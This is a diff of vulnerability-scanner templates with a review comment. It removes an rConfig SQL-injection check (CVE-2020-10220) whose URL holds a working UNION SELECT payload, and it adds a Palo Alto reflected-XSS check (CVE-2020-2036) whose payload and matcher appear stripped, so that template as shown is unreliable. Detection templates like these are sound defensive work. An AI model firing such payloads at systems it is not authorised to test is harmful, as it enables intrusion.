diff --git a/cves/2020/CVE-2020-10220.yaml b/cves/2020/CVE-2020-10220.yaml
deleted file mode 100644
index 3548e11eda..0000000000
--- a/cves/2020/CVE-2020-10220.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: CVE-2020-10220
-info:
- name: rConfig SQLi
- author: madrobot
- severity: high
- reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10220
- tags: SQLI
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)%20limit%200,1),NULL--"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "[project-discovery]"
- part: body
diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml
new file mode 100644
index 0000000000..0749aebbe9
--- /dev/null
+++ b/cves/2020/CVE-2020-2036.yaml
@@ -0,0 +1,22 @@
+id: CVE-2020-2036
+info:
+ name: Palo Alto Networks Reflected Cross Site Scripting
+ author: madrobot
+ severity: medium
+ reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2036
+ reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
+ tags: XSS
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/unauth/php/change_password.php/">"
+ - "{{BaseURL}}/php/change_password.php/">"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - ""
+ part: body
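Review bot: The `info` block of the new CVE-2020-2036 template sets `reference:` twice; duplicate mapping keys are invalid YAML and most parsers silently keep only the last one, so the MITRE link is dropped (a strict parser may reject the file). Use a single key holding a list: `reference:` followed by `- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2036` and `- https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/`. Separately, as rendered on this page the word matcher is the empty string `""` and both paths end in `">`, which looks like markup stripped by the page rendering rather than the real template text; this is worth confirming against the raw file, because an empty word would match every 200 response and report unaffected hosts as vulnerable. For a reflected-XSS check, an additional word matcher with `part: header` on `text/html` would cut false positives from responses that echo the input in a non-HTML content type.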